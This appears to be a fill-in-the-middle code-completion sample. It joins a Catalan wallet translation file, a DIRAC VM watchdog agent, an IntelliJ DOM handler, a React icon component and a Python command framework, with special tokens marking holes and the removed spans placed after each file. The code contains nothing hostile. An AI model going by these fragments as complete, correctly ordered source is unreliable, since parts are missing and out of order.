matching built-in checkpoints (default: 1)</source> <translation>Tan sols acceptar cadenes de blocs que coincideixin amb els punts de prova (per defecte: 1)</translation> </message> <message> <location line="+1"/> <source>Only connect to nodes in network &lt;net&gt; (IPv4, IPv6 or Tor)</source> <translation>Només connectar als nodes de la xarxa &lt;net&gt; (IPv4, IPv6 o Tor)</translation> </message> <message> <location line="+2"/> <source>Output extra debugging information. Implies all other -debug* options</source> <translation>Sortida de la informació extra de debugging. Implica totes les demés opcions -debug*</translation> </message> <message> <location line="+1"/> <source>Output extra network debugging information</source> <translation>Sortida de la informació extra de debugging de xarxa.</translation> </message> <message> <location line="+2"/> <source>Prepend debug output with timestamp</source> <translation>Anteposar estampa temporal a les dades de debug</translation> </message> <message> <location line="+5"/> <source>SSL options: (see the Bitcoin Wiki for SSL setup instructions)</source> <translation>Opcions SSL: (veure la Wiki de Badcoin per a instruccions de configuració SSL)</translation> </message> <message> <location line="+1"/> <source>Select the version of socks proxy to use (4-5, default: 5)</source> <translation>Selecciona la versió de socks proxy a utilitzar (4-5, per defecte: 5)</translation> </message> <message> <location line="+3"/> <source>Send trace/debug info to console instead of debug.log file</source> <translation>Enviar informació de traça/debug a la consola en comptes del arxiu debug.log</translation> </message> <message> <location line="+1"/> <source>Send trace/debug info to debugger</source> <translation>Enviar informació de traça/debug a un debugger</translation> </message> <message> <location line="+5"/> <source>Set maximum block size in bytes (default: 250000)</source> <translation>Establir una mida màxima de bloc en bytes (per defecte: 250000)</translation> </message> <message> <location line="+1"/> <source>Set minimum block size in bytes (default: 0)</source> <translation>Establir una mida mínima de bloc en bytes (per defecte: 0)</translation> </message> <message> <location line="+2"/> <source>Shrink debug.log file on client startup (default: 1 when no -debug)</source> <translation>Reduir l&apos;arxiu debug.log al iniciar el client (per defecte 1 quan no -debug)</translation> </message> <message> <location line="+1"/> <source>Signing transaction failed</source> <translation type="unfinished"/> </message> <message> <location line="+2"/> <source>Specify connection timeout in milliseconds (default: 5000)</source> <translation>Especificar el temps limit per a un intent de connexió en milisegons (per defecte: 5000)</translation> </message> <message> <location line="+4"/> <source>System error: </source> <translation>Error de sistema:</translation> </message> <message> <location line="+4"/> <source>Transaction amount too small</source> <translation type="unfinished"/> </message> <message> <location line="+1"/> <source>Transaction amounts must be positive</source> <translation type="unfinished"/> </message> <message> <location line="+1"/> <source>Transaction too large</source> <translation type="unfinished"/> </message> <message> <location line="+7"/> <source>Use UPnP to map the listening port (default: 0)</source> <translation>Utilitza UPnP per a mapejar els ports d&apos;escolta (per defecte: 0)</translation> </message> <message> <location line="+1"/> <source>Use UPnP to map the listening port (default: 1 when listening)</source> <translation>Utilitza UPnP per a mapejar els ports d&apos;escolta (per defecte: 1 quan s&apos;escolta)</translation> </message> <message> <location line="+1"/> <source>Use proxy to reach tor hidden services (default: same as -proxy)</source> <translation>Utilitzar proxy per arribar als serveis tor amagats (per defecte: el mateix que -proxy)</translation> </message> <message> <location line="+2"/> <source>Username for JSON-RPC connections</source> <translation>Nom d&apos;usuari per a connexions JSON-RPC</translation> </message> <message> <location line="+4"/> <source>Warning</source> <translation>Avís</translation> </message> <message> <location line="+1"/> <source>Warning: This version is obsolete, upgrade required!</source> <translation>Advertència: Aquetsa versió està obsoleta, és necessari actualitzar!</translation> </message> <message> <location line="+1"/> <source>You need to rebuild the databases using -reindex to change -txindex</source> <translation>Necessiteu reconstruir les bases de dades usant -reindex per canviar -txindex</translation> </message> <message> <location line="+1"/> <source>wallet.dat corrupt, salvage failed</source> <translation>L&apos;arxiu wallet.data és corrupte, el rescat de les dades ha fallat</translation> </message> <message> <location line="-50"/> <source>Password for JSON-RPC connections</source> <translation>Contrasenya per a connexions JSON-RPC</translation> </message> <message> <location line="-67"/> <source>Allow JSON-RPC connections from specified IP address</source> <translation>Permetre connexions JSON-RPC d&apos;adreces IP específiques</translation> </message> <message> <location line="+76"/> <source>Send commands to node running on &lt;ip&gt; (default: 127.0.0.1)</source> <translation>Enviar ordre al node en execució a &lt;ip&gt; (per defecte: 127.0.0.1)</translation> </message> <message> <location line="-120"/> <source>Execute command when the best block changes (%s in cmd is replaced by block hash)</source> <translation>Executar orde quan el millor bloc canviï (%s al cmd es reemplaça per un bloc de hash)</translation> </message> <message> <location line="+147"/> <source>Upgrade wallet to latest format</source> <translation>Actualitzar moneder a l&apos;últim format</translation> </message> <message> <location line="-21"/> <source>Set key pool size to &lt;n&gt; (default: 100)</source> <translation>Establir límit de nombre de claus a &lt;n&gt; (per defecte: 100)</translation> </message> <message> <location line="-12"/> <source>Rescan the block chain for missing wallet transactions</source> <translation>Re-escanejar cadena de blocs en cerca de transaccions de moneder perdudes</translation> </message> <message> <location line="+35"/> <source>Use OpenSSL (https) for JSON-RPC connections</source> <translation>Utilitzar OpenSSL (https) per a connexions JSON-RPC</translation> </message> <message> <location line="-26"/> <source>Server certificate file (default: server.cert)</source> <translation>Arxiu del certificat de servidor (per defecte: server.cert)</translation> </message> <message> <location line="+1"/> <source>Server private key (default: server.pem)</source> <translation>Clau privada del servidor (per defecte: server.pem)</translation> </message> <message> <location line="-151"/> <source>Acceptable ciphers (default: TLSv1+HIGH:!SSLv2:!aNULL:!eNULL:!AH:!3DES:@STRENGTH)</source> <translation>Xifrats acceptats (per defecte: TLSv1+HIGH:!SSLv2:!aNULL:!eNULL:!AH:!3DES:@STRENGTH)</translation> </message> <message> <location line="+165"/> <source>This help message</source> <translation>Aquest misatge d&apos;ajuda</translation> </message> <message> <location line="+6"/> <source>Unable to bind to %s on this computer (bind returned error %d, %s)</source> <translation>Impossible d&apos;unir %s a aquest ordinador (s&apos;ha retornat l&apos;error %d, %s)</translation> </message> <message> <location line="-91"/> <source>Connect through socks proxy</source> <translation>Connectar a través de socks proxy</translation> </message> <message> <location line="-10"/> <source>Allow DNS lookups for -addnode, -seednode and -connect</source> <translation>Permetre consultes DNS per a -addnode, -seednode i -connect</translation> </message> <message> <location line="+55"/> <source>Loading addresses...</source> <translation>Carregant adreces...</translation> </message> <message> <location line="-35"/> <source>Error loading wallet.dat: Wallet corrupted</source> <translation>Error carregant wallet.dat: Moneder corrupte</translation> </message> <message> <location line="+1"/> <source>Error loading wallet.dat: Wallet requires newer version of Bitcoin</source> <translation>Error carregant wallet.dat: El moneder requereix una versió de Badcoin més moderna</translation> </message> <message> <location line="+93"/> <source>Wallet needed to be rewritten: restart Bitcoin to complete</source> <translation>El moneder necesita ser re-escrit: re-inicia Badcoin per a completar la tasca</translation> </message> <message> <location line="-95"/> <source>Error loading wallet.dat</source> <translation>Error carregant wallet.dat</translation> </message> <message> <location line="+28"/> <source>Invalid -proxy address: &apos;%s&apos;</source> <translation>Adreça -proxy invalida: &apos;%s&apos;</translation> </message> <message> <location line="+56"/> <source>Unknown network specified in -onlynet: &apos;%s&apos;</source> <translation>Xarxa desconeguda especificada a -onlynet: &apos;%s&apos;</translation> </message> <message> <location line="-1"/> <source>Unknown -socks proxy version requested: %i</source> <translation>S&apos;ha demanat una versió desconeguda de -socks proxy: %i</translation> </message> <message> <location line="-96"/> <source>Cannot resolve -bind address: &apos;%s&apos;</source> <translation>No es pot resoldre l&apos;adreça -bind: &apos;%s&apos;</translation> </message> <message> <location line="+1"/> <source>Cannot resolve -externalip address: &apos;%s&apos;</source> <translation>No es pot resoldre l&apos;adreça -externalip: &apos;%s&apos;</translation> </message> <message> <location line="+44"/> <source>Invalid amount for -paytxfee=&lt;amount&gt;: &apos;%s&apos;</source> <translation>Quantitat invalida per a -paytxfee=&lt;amount&gt;: &apos;%s&apos;</translation> </message> <message> <location line="+1"/> <source>Invalid amount</source> <translation>Quanitat invalida</translation> </message> <message> <location line="-6"/> <source>Insufficient funds</source> <translation>Balanç insuficient</translation> </message> <message> <location line="+10"/> <source>Loading block index...</source> <translation>Carregant índex de blocs...</translation> </message> <message> <location line="-57"/> <source>Add a node to connect to and attempt to keep the connection open</source> <translation>Afegir un node per a connectar&apos;s-hi i intentar mantenir la connexió oberta</translation> </message> <message> <location line="-25"/> <source>Unable to bind to %s on this computer. Bitcoin is probably already running.</source> <translation>Impossible d&apos;unir %s en aquest ordinador. Probablement Badcoin ja estigui en execució.</translation> </message> <message> <location line="+64"/> <source>Fee per KB to add to transactions you send</source> <translation>Comisió a afegir per cada KB de transaccions que enviïs</translation> </message> <message> <location line="+19"/> <source>Loading wallet...</source> <translation>Carregant moneder...</translation> </message> <message> <location line="-52"/> <source>Cannot downgrade wallet</source> <translation>No es pot reduir la versió del moneder</translation> </message> <message> <location line="+3"/> <source>Cannot write default address</source> <translation>No es pot escriure l&apos;adreça per defecte</translation> </message> <message> <location line="+64"/> <source>Rescanning...</source> <translation>Re-escanejant...</translation> </message> <message> <location line="-57"/> <source>Done loading</source> <translation>Càrrega acabada</translation> </message> <message> <location line="+82"/> <source>To use the %s option</source> <translation>Utilitza la opció %s</translation> </message> <message> <location line="-74"/> <source>Error</source> <translation>Error</translation> </message> <message> <location line="-31"/> <source>You must set rpcpassword=&lt;password&gt; in the configuration file: %s If the file does not exist, create it with owner-readable-only file permissions.</source> <translation>Has de configurar el rpcpassword=&lt;password&gt; a l&apos;arxiu de configuració:\n %s\n Si l&apos;arxiu no existeix, crea&apos;l amb els permís owner-readable-only.</translation> </message> </context> </TS><|fim▁end|>
</message>
<|file_name|>VirtualMachineMonitorAgent.py<|end_file_name|><|fim▁begin|>""" VirtualMachineMonitorAgent plays the role of the watch dog for the Virtual Machine """ import os import time import glob # DIRAC from DIRAC import S_OK, S_ERROR, gConfig, rootPath from DIRAC.ConfigurationSystem.Client.Helpers import Operations from DIRAC.Core.Base.AgentModule import AgentModule from DIRAC.Core.Utilities import List, Network # VMDIRAC from VMDIRAC.WorkloadManagementSystem.Client.ServerUtils import virtualMachineDB __RCSID__ = "$Id$" class VirtualMachineMonitorAgent( AgentModule ): def __getCSConfig( self ): if not self.runningPod: return S_ERROR( "/LocalSite/RunningPod is not defined" ) #Variables coming from the vm imgPath = "/Cloud/%s" % self.runningPod for csOption, csDefault, varName in ( ( "MinWorkingLoad", 0.01, "vmMinWorkingLoad" ), ( "LoadAverageTimespan", 60, "vmLoadAvgTimespan" ), ( "HaltPeriod", 600, "haltPeriod" ), ( "HaltBeforeMargin", 300, "haltBeforeMargin" ), ( "HeartBeatPeriod", 300, "heartBeatPeriod" ), ): path = "%s/%s" % ( imgPath, csOption ) value = self.op.getValue( path, csDefault ) if not value > 0: return S_ERROR( "%s has an incorrect value, must be > 0" % path ) setattr( self, varName, value ) for csOption, csDefault, varName in ( ( "JobWrappersLocation", "/scratch", "vmJobWrappersLocation" ), ): path = "%s/%s" % ( imgPath, csOption ) value = gConfig.getValue( path, csDefault ) if not value : return S_ERROR( "%s points to an empty string, cannot be!" % path ) setattr( self, varName, value ) self.haltBeforeMargin = max( self.haltBeforeMargin, int( self.am_getPollingTime() ) + 5 ) self.haltPeriod = max( self.haltPeriod, int( self.am_getPollingTime() ) + 5 ) self.heartBeatPeriod = max( self.heartBeatPeriod, int( self.am_getPollingTime() ) + 5 ) self.log.info( "** VM Info **" ) self.log.info( "Name : %s" % self.runningPod ) self.log.info( "Min Working Load : %f" % self.vmMinWorkingLoad ) self.log.info( "Load Avg Timespan : %d" % self.vmLoadAvgTimespan ) self.log.info( "Job wrappers location : %s" % self.vmJobWrappersLocation ) self.log.info( "Halt Period : %d" % self.haltPeriod ) self.log.info( "Halt Before Margin : %d" % self.haltBeforeMargin ) self.log.info( "HeartBeat Period : %d" % self.heartBeatPeriod ) if self.vmID: self.log.info( "DIRAC ID : %s" % self.vmID ) if self.uniqueID: self.log.info( "Unique ID : %s" % self.uniqueID ) self.log.info( "*************" ) return S_OK() def __declareInstanceRunning( self ): #Connect to VM monitor and register as running retries = 3 sleepTime = 30 for i in range( retries ): result = virtualMachineDB.declareInstanceRunning( self.uniqueID, self.ipAddress ) if result[ 'OK' ]: self.log.info( "Declared instance running" ) return result self.log.error( "Could not declare instance running", result[ 'Message' ] ) if i < retries - 1 : self.log.info( "Sleeping for %d seconds and retrying" % sleepTime ) time.sleep( sleepTime ) return S_ERROR( "Could not declare instance running after %d retries" % retries ) def initialize( self ): self.am_disableMonitoring() #Init vars self.runningPod = gConfig.getValue( '/LocalSite/RunningPod' ) self.log.info( "Running pod name of the image is %s" % self.runningPod ) self.vmID = gConfig.getValue( '/LocalSite/VMID' ) self.__loadHistory = [] self.vmMinWorkingLoad = None self.vmLoadAvgTimespan = None self.vmJobWrappersLocation = None self.haltPeriod = None self.haltBeforeMargin = None self.heartBeatPeriod = None self.am_setOption( "MaxCycles", 0 ) self.am_setOption( "PollingTime", 60 ) #Discover net address netData = Network.discoverInterfaces() for iface in sorted( netData ): if iface.find( "eth" ) == 0: self.ipAddress = netData[ iface ][ 'ip' ] break self.log.info( "IP Address is %s" % self.ipAddress ) #getting the stop policy self.op = Operations.Operations() self.vmStopPolicy = self.op.getValue( "Cloud/%s/VMStopPolicy", 'elastic' ) self.log.info( "vmStopPolicy is %s" % self.vmStopPolicy ) #Declare instance running self.uniqueID = '' result = virtualMachineDB.getUniqueIDByName( self.vmID ) if result['OK']: self.uniqueID = result['Value']<|fim▁hole|> return S_ERROR( "Halting!" ) self.__instanceInfo = result[ 'Value' ] #Get the cs config result = self.__getCSConfig() if not result[ 'OK' ]: return result return S_OK() def __getLoadAvg( self ): result = self.__getCSConfig() if not result[ 'OK' ]: return result with open( "/proc/loadavg", "r" ) as fd: data = [ float( v ) for v in List.fromChar( fd.read(), " " )[:3] ] self.__loadHistory.append( data ) numRequiredSamples = max( self.vmLoadAvgTimespan / self.am_getPollingTime(), 1 ) while len( self.__loadHistory ) > numRequiredSamples: self.__loadHistory.pop( 0 ) self.log.info( "Load averaged over %d seconds" % self.vmLoadAvgTimespan ) self.log.info( " %d/%s required samples to average load" % ( len( self.__loadHistory ), numRequiredSamples ) ) avgLoad = 0 for f in self.__loadHistory: avgLoad += f[0] return avgLoad / len( self.__loadHistory ), len( self.__loadHistory ) == numRequiredSamples def __getNumJobWrappers( self ): if not os.path.isdir( self.vmJobWrappersLocation ): return 0 self.log.info( "VM job wrappers path: %s" % self.vmJobWrappersLocation ) jdlList = glob.glob( os.path.join( self.vmJobWrappersLocation, "*", "*.jdl" ) ) return len( jdlList ) def execute( self ): #Get load avgLoad, avgRequiredSamples = self.__getLoadAvg() self.log.info( "Load Average is %.2f" % avgLoad ) if not avgRequiredSamples: self.log.info( " Not all required samples yet there" ) #Do we need to send heartbeat? with open( "/proc/uptime" ) as fd: uptime = float( List.fromChar( fd.read().strip(), " " )[0] ) hours = int( uptime / 3600 ) minutes = int( uptime - hours * 3600 ) / 60 seconds = uptime - hours * 3600 - minutes * 60 self.log.info( "Uptime is %.2f (%d:%02d:%02d)" % ( uptime, hours, minutes, seconds ) ) #Num jobs numJobs = self.__getNumJobWrappers() self.log.info( "There are %d job wrappers" % numJobs ) if uptime % self.heartBeatPeriod <= self.am_getPollingTime(): #Heartbeat time! self.log.info( "Sending hearbeat..." ) result = virtualMachineDB.instanceIDHeartBeat( self.uniqueID, avgLoad, numJobs, 0, 0, ) status = None if result[ 'OK' ]: self.log.info( " heartbeat sent!" ) status = result['Value'] else: if "Transition" in result["Message"]: self.log.error( "Error on service:", result[ 'Message' ] ) status = result['State'] else: self.log.error("Connection error", result["Message"]) if status: self.__processHeartBeatMessage( status, avgLoad ) #Do we need to check if halt? if avgRequiredSamples and uptime % self.haltPeriod + self.haltBeforeMargin > self.haltPeriod: self.log.info( "Load average is %s (minimum for working instance is %s)" % ( avgLoad, self.vmMinWorkingLoad ) ) #current stop polices: elastic (load) and never if self.vmStopPolicy == 'elastic': #If load less than X, then halt! if avgLoad < self.vmMinWorkingLoad: self.__haltInstance( avgLoad ) if self.vmStopPolicy == 'never': self.log.info( "VM stop policy is defined as never (until SaaS or site request)") return S_OK() def __processHeartBeatMessage( self, hbMsg, avgLoad = 0.0 ): if hbMsg == 'stop': #Write stop file for jobAgent self.log.info( "Received STOP signal. Writing stop files..." ) for agentName in [ "WorkloadManagement/JobAgent" ]: ad = os.path.join( *agentName.split( "/" ) ) stopDir = os.path.join( gConfig.getValue( '/LocalSite/InstancePath', rootPath ), 'control', ad ) stopFile = os.path.join( stopDir, "stop_agent" ) try: if not os.path.isdir( stopDir ): os.makedirs( stopDir ) fd = open( stopFile, "w" ) fd.write( "stop!" ) fd.close() self.log.info( "Wrote stop file %s for agent %s" % ( stopFile, agentName ) ) except Exception, e: self.log.error( "Could not write stop agent file", stopFile ) if hbMsg == 'halt': self.__haltInstance( avgLoad ) def __haltInstance( self, avgLoad = 0.0 ): self.log.info( "Halting instance..." ) retries = 3 sleepTime = 10 for i in range( retries ): result = virtualMachineDB.declareInstanceHalting( self.uniqueID, avgLoad ) if result[ 'OK' ]: self.log.info( "Declared instance halting" ) break self.log.error( "Could not send halting state:", result[ 'Message' ] ) if i < retries - 1 : self.log.info( "Sleeping for %d seconds and retrying" % sleepTime ) time.sleep( sleepTime ) #self.log.info( "Executing system halt..." ) #os.system( "halt" )<|fim▁end|>
result = self.__declareInstanceRunning() if not result[ 'OK' ]: self.log.error( "Could not declare instance running", result[ 'Message' ] ) self.__haltInstance()
<|file_name|>DomRootInvocationHandler.java<|end_file_name|><|fim▁begin|>package com.intellij.util.xml.impl; import com.intellij.openapi.diagnostic.Logger; import com.intellij.openapi.util.NullableFactory; import com.intellij.openapi.util.text.StringUtil; import com.intellij.psi.XmlElementFactory; import com.intellij.psi.xml.XmlDocument; import com.intellij.psi.xml.XmlFile; import com.intellij.psi.xml.XmlTag; import com.intellij.util.IncorrectOperationException; import com.intellij.util.xml.DomElement; import com.intellij.util.xml.DomFileElement; import com.intellij.util.xml.DomNameStrategy; import com.intellij.util.xml.EvaluatedXmlName; import com.intellij.util.xml.stubs.ElementStub; import org.jetbrains.annotations.NonNls; import javax.annotation.Nonnull; import javax.annotation.Nullable; import java.util.List; /** * @author peter */ public class DomRootInvocationHandler extends DomInvocationHandler<AbstractDomChildDescriptionImpl, ElementStub> { private static final Logger LOG = Logger.getInstance("#com.intellij.util.xml.impl.DomRootInvocationHandler"); private final DomFileElementImpl<?> myParent; <|fim▁hole|> public DomRootInvocationHandler(final Class aClass, final RootDomParentStrategy strategy, @Nonnull final DomFileElementImpl fileElement, @Nonnull final EvaluatedXmlName tagName, @Nullable ElementStub stub ) { super(aClass, strategy, tagName, new AbstractDomChildDescriptionImpl(aClass) { @Nonnull public List<? extends DomElement> getValues(@Nonnull final DomElement parent) { throw new UnsupportedOperationException(); } public int compareTo(final AbstractDomChildDescriptionImpl o) { throw new UnsupportedOperationException(); } }, fileElement.getManager(), true, stub); myParent = fileElement; } public void undefineInternal() { try { final XmlTag tag = getXmlTag(); if (tag != null) { deleteTag(tag); detach(); fireUndefinedEvent(); } } catch (Exception e) { LOG.error(e); } } public boolean equals(final Object obj) { if (!(obj instanceof DomRootInvocationHandler)) return false; final DomRootInvocationHandler handler = (DomRootInvocationHandler)obj; return myParent.equals(handler.myParent); } public int hashCode() { return myParent.hashCode(); } @Nonnull public String getXmlElementNamespace() { return getXmlName().getNamespace(getFile(), getFile()); } @Override protected String checkValidity() { final XmlTag tag = (XmlTag)getXmlElement(); if (tag != null && !tag.isValid()) { return "invalid root tag"; } final String s = myParent.checkValidity(); if (s != null) { return "root: " + s; } return null; } @Nonnull public DomFileElementImpl getParent() { return myParent; } public DomElement createPathStableCopy() { final DomFileElement stableCopy = myParent.createStableCopy(); return getManager().createStableValue(new NullableFactory<DomElement>() { public DomElement create() { return stableCopy.isValid() ? stableCopy.getRootElement() : null; } }); } protected XmlTag setEmptyXmlTag() { final XmlTag[] result = new XmlTag[]{null}; getManager().runChange(new Runnable() { public void run() { try { final String namespace = getXmlElementNamespace(); @NonNls final String nsDecl = StringUtil.isEmpty(namespace) ? "" : " xmlns=\"" + namespace + "\""; final XmlFile xmlFile = getFile(); final XmlTag tag = XmlElementFactory.getInstance(xmlFile.getProject()).createTagFromText("<" + getXmlElementName() + nsDecl + "/>"); result[0] = ((XmlDocument)xmlFile.getDocument().replace(((XmlFile)tag.getContainingFile()).getDocument())).getRootTag(); } catch (IncorrectOperationException e) { LOG.error(e); } } }); return result[0]; } @Nonnull public final DomNameStrategy getNameStrategy() { final Class<?> rawType = getRawType(); final DomNameStrategy strategy = DomImplUtil.getDomNameStrategy(rawType, isAttribute()); if (strategy != null) { return strategy; } return DomNameStrategy.HYPHEN_STRATEGY; } }<|fim▁end|>
<|file_name|>FontAwesomeIcon.tsx<|end_file_name|><|fim▁begin|>'use strict'; import React = require('react'); export class FontAwesomeIcon extends React.Component<{ path?: string }, {}> { // NOTES: SVG path data was obtained from: https://github.com/encharm/Font-Awesome-SVG-PNG/tree/master/black/svg // They assume a viewBox of '0 0 1792 1792'. // // Styling can be done in (S)CSS using the 'fa-svg' class (for icon height/width/alignment) and 'fa-svg-path' class (for fill color). public static paths = { CaretDown: 'M1408 704q0 26-19 45l-448 448q-19 19-45 19t-45-19l-448-448q-19-19-19-45t19-45 45-19h896q26 0 45 19t19 45z', CaretRight: 'M1152 896q0 26-19 45l-448 448q-19 19-45 19t-45-19-19-45v-896q0-26 19-45t45-19 45 19l448 448q19 19 19 45z', <|fim▁hole|> TimesCircle: 'M1277 1122q0-26-19-45l-181-181 181-181q19-19 19-45 0-27-19-46l-90-90q-19-19-46-19-26 0-45 19l-181 181-181-181q-19-19-45-19-27 0-46 19l-90 90q-19 19-19 46 0 26 19 45l181 181-181 181q-19 19-19 45 0 27 19 46l90 90q19 19 46 19 26 0 45-19l181-181 181 181q19 19 45 19 27 0 46-19l90-90q19-19 19-46zm387-226q0 209-103 385.5t-279.5 279.5-385.5 103-385.5-103-279.5-279.5-103-385.5 103-385.5 279.5-279.5 385.5-103 385.5 103 279.5 279.5 103 385.5z', Warning: 'M1024 1375v-190q0-14-9.5-23.5t-22.5-9.5h-192q-13 0-22.5 9.5t-9.5 23.5v190q0 14 9.5 23.5t22.5 9.5h192q13 0 22.5-9.5t9.5-23.5zm-2-374l18-459q0-12-10-19-13-11-24-11h-220q-11 0-24 11-10 7-10 21l17 457q0 10 10 16.5t24 6.5h185q14 0 23.5-6.5t10.5-16.5zm-14-934l768 1408q35 63-2 126-17 29-46.5 46t-63.5 17h-1536q-34 0-63.5-17t-46.5-46q-37-63-2-126l768-1408q17-31 47-49t65-18 65 18 47 49z' }; public render() { return <svg className='fa-svg' viewBox='0 0 1792 1792'><path className='fa-svg-path' d={this.props.path || ''}/></svg>; } }<|fim▁end|>
<|file_name|>base.py<|end_file_name|><|fim▁begin|>""" Base classes for writing management commands (named commands which can be executed through ``tipi.py``). """ import os import sys from ConfigParser import ConfigParser from optparse import make_option, OptionParser from virtualenv import resolve_interpreter class CommandError(Exception): """ Exception class indicating a problem while executing a management command. If this exception is raised during the execution of a management command, it will be caught and turned into a nicely-printed error message to the appropriate output stream (i.e., stderr); as a result, raising this exception (with a sensible description of the error) is the preferred way to indicate that something has gone wrong in the execution of a command. """ pass class BaseCommand(object): """ The base class from which all management commands ultimately derive. Use this class if you want access to all of the mechanisms which<|fim▁hole|> parse the command-line arguments and work out what code to call in response; if you don't need to change any of that behavior, consider using one of the subclasses defined in this file. If you are interested in overriding/customizing various aspects of the command-parsing and -execution behavior, the normal flow works as follows: 1. ``tipi.py`` loads the command class and calls its ``run_from_argv()`` method. 2. The ``run_from_argv()`` method calls ``create_parser()`` to get an ``OptionParser`` for the arguments, parses them, performs any environment changes requested by options like ``pythonpath``, and then calls the ``execute()`` method, passing the parsed arguments. 3. The ``execute()`` method attempts to carry out the command by calling the ``handle()`` method with the parsed arguments; any output produced by ``handle()`` will be printed to standard output. 4. If ``handle()`` raised a ``CommandError``, ``execute()`` will instead print an error message to ``stderr``. Thus, the ``handle()`` method is typically the starting point for subclasses; many built-in commands and command types either place all of their logic in ``handle()``, or perform some additional parsing work in ``handle()`` and then delegate from it to more specialized methods as needed. Several attributes affect behavior at various steps along the way: ``args`` A string listing the arguments accepted by the command, suitable for use in help messages; e.g., a command which takes a list of application names might set this to '<appname appname ...>'. ``help`` A short description of the command, which will be printed in help messages. ``option_list`` This is the list of ``optparse`` options which will be fed into the command's ``OptionParser`` for parsing arguments. """ # Metadata about this command. option_list = ( make_option('-v', '--verbose', action='store', dest='verbose', default='1', type='choice', choices=['0', '1', '2'], help='Verbosity level; 0=minimal output, 1=normal output, 2=all output'), make_option('-p', '--python', help='The Python interpreter to use, e.g., --python=python2.5 will use the python2.5 ' 'interpreter to create the new environment. The default is the interpreter that ' 'virtualenv was installed with (%s)' % sys.executable), make_option('--traceback', action='store_true', help='Print traceback on exception'), ) help = '' args = '' #TODO syntax coloring support #def __init__(self): # #self.style = color_style() # try: # home = os.getenv('USERPROFILE') or os.getenv('HOME') # config = ConfigParser(open(os.path.join(home, '.tipirc'))) # except IOError: # pass # except: # pass # # self._interpreter = resolve_interpreter('python') # #@property #def python_interpreter(self): # return self._interpreter def get_version(self): """ Return the Django version, which should be correct for all built-in Django commands. User-supplied commands should override this method. """ #TODO placeholder return (0, 1, 0,) def usage(self, subcommand): """ Return a brief description of how to use this command, by default from the attribute ``self.help``. """ usage = '%%prog %s [options] %s' % (subcommand, self.args) if self.help: return '%s\n\n%s' % (usage, self.help) else: return usage def create_parser(self, prog_name, subcommand): """ Create and return the ``OptionParser`` which will be used to parse the arguments to this command. """ return OptionParser(prog=prog_name, usage=self.usage(subcommand), version=str(self.get_version()), option_list=self.option_list) def print_help(self, prog_name, subcommand): """ Print the help message for this command, derived from ``self.usage()``. """ parser = self.create_parser(prog_name, subcommand) parser.print_help() def run_from_argv(self, argv): """ Set up any environment changes requested, then run this command. """ parser = self.create_parser(argv[0], argv[1]) options, args = parser.parse_args(argv[2:]) self.execute(*args, **options.__dict__) def execute(self, *args, **options): """ Try to execute this command. If the command raises a ``CommandError``, intercept it and print it sensibly to stderr. """ try: #output = self.handle(*args, **options) print self.handle(*args, **options) #if output: # print output except CommandError, e: #sys.stderr.write(self.style.ERROR(str('Error: %s\n' % e))) sys.stderr.write(str('Error: %s\n' % e)) sys.exit(1) def handle(self, *args, **options): """ The actual logic of the command. Subclasses must implement this method. """ raise NotImplementedError() #class AppCommand(BaseCommand): # """ # A management command which takes one or more installed application # names as arguments, and does something with each of them. # # Rather than implementing ``handle()``, subclasses must implement # ``handle_app()``, which will be called once for each application. # # """ # args = '<appname appname ...>' # # def handle(self, *app_labels, **options): # from django.db import models # if not app_labels: # raise CommandError('Enter at least one appname.') # try: # app_list = [models.get_app(app_label) for app_label in app_labels] # except (ImproperlyConfigured, ImportError), e: # raise CommandError("%s. Are you sure your INSTALLED_APPS setting is correct?" % e) # output = [] # for app in app_list: # app_output = self.handle_app(app, **options) # if app_output: # output.append(app_output) # return '\n'.join(output) # # def handle_app(self, app, **options): # """ # Perform the command's actions for ``app``, which will be the # Python module corresponding to an application name given on # the command line. # # """ # raise NotImplementedError() class LabelCommand(BaseCommand): """ A management command which takes one or more arbitrary arguments (labels) on the command line, and does something with each of them. Rather than implementing ``handle()``, subclasses must implement ``handle_label()``, which will be called once for each label. If the arguments should be names of installed applications, use ``AppCommand`` instead. """ args = '<label label ...>' label = 'label' def handle(self, *labels, **options): if not labels: raise CommandError('Enter at least one %s.' % self.label) output = [] for label in labels: label_output = self.handle_label(label, **options) if label_output: output.append(label_output) return '\n'.join(output) def handle_label(self, label, **options): """ Perform the command's actions for ``label``, which will be the string as given on the command line. """ raise NotImplementedError() #class NoArgsCommand(BaseCommand): # """ # A command which takes no arguments on the command line. # # Rather than implementing ``handle()``, subclasses must implement # ``handle_noargs()``; ``handle()`` itself is overridden to ensure # no arguments are passed to the command. # # Attempting to pass arguments will raise ``CommandError``. # # """ # args = '' # # def handle(self, *args, **options): # if args: # raise CommandError("Command doesn't accept any arguments") # return self.handle_noargs(**options) # # def handle_noargs(self, **options): # """ # Perform this command's actions. # # """ # raise NotImplementedError() #def copy_helper(style, app_or_project, name, directory, other_name=''): # """ # Copies either a Django application layout template or a Django project # layout template into the specified directory. # # """ # # style -- A color style object (see django.core.management.color). # # app_or_project -- The string 'app' or 'project'. # # name -- The name of the application or project. # # directory -- The directory to which the layout template should be copied. # # other_name -- When copying an application layout, this should be the name # # of the project. # import re # import shutil # other = {'project': 'app', 'app': 'project'}[app_or_project] # if not re.search(r'^[_a-zA-Z]\w*$', name): # If it's not a valid directory name. # # Provide a smart error message, depending on the error. # if not re.search(r'^[_a-zA-Z]', name): # message = 'make sure the name begins with a letter or underscore' # else: # message = 'use only numbers, letters and underscores' # raise CommandError("%r is not a valid %s name. Please %s." % (name, app_or_project, message)) # top_dir = os.path.join(directory, name) # try: # os.mkdir(top_dir) # except OSError, e: # raise CommandError(e) # # # Determine where the app or project templates are. Use # # django.__path__[0] because we don't know into which directory # # django has been installed. # template_dir = os.path.join(django.__path__[0], 'conf', '%s_template' % app_or_project) # # for d, subdirs, files in os.walk(template_dir): # relative_dir = d[len(template_dir)+1:].replace('%s_name' % app_or_project, name) # if relative_dir: # os.mkdir(os.path.join(top_dir, relative_dir)) # for i, subdir in enumerate(subdirs): # if subdir.startswith('.'): # del subdirs[i] # for f in files: # if not f.endswith('.py'): # # Ignore .pyc, .pyo, .py.class etc, as they cause various # # breakages. # continue # path_old = os.path.join(d, f) # path_new = os.path.join(top_dir, relative_dir, f.replace('%s_name' % app_or_project, name)) # fp_old = open(path_old, 'r') # fp_new = open(path_new, 'w') # fp_new.write(fp_old.read().replace('{{ %s_name }}' % app_or_project, name).replace('{{ %s_name }}' % other, other_name)) # fp_old.close() # fp_new.close() # try: # shutil.copymode(path_old, path_new) # _make_writeable(path_new) # except OSError: # sys.stderr.write(style.NOTICE("Notice: Couldn't set permission bits on %s. You're 